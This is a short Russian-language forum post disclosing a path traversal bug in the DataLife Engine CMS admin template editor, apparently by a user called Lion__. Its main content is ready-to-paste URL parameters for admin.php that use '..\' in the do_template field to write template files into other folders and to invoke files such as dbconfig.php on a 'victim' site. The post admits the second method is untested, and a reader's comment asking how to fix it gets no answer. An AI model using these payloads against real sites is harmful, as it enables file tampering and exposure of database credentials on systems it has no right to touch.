» » Баг - прямой вызов файлов и мусор в папках

Баг - прямой вызов файлов и мусор в папках

Баг - прямой вызов файлов и мусор в папках

Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DataLife Engine уязвимость работает на версиях: ВСЕ DataLife Engine

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Автор: Lion__

Переходим по ссылке:
http://жертва/admin.php?mod=templates
Получаем юрл с хешем, дописываем:

Если вам надо расподить файлы шаблона в нужную папку:
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\



Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=



Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит

Комментарии

а исправить то как ?

Информация

Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.


Личные сообщения

Ваши переписки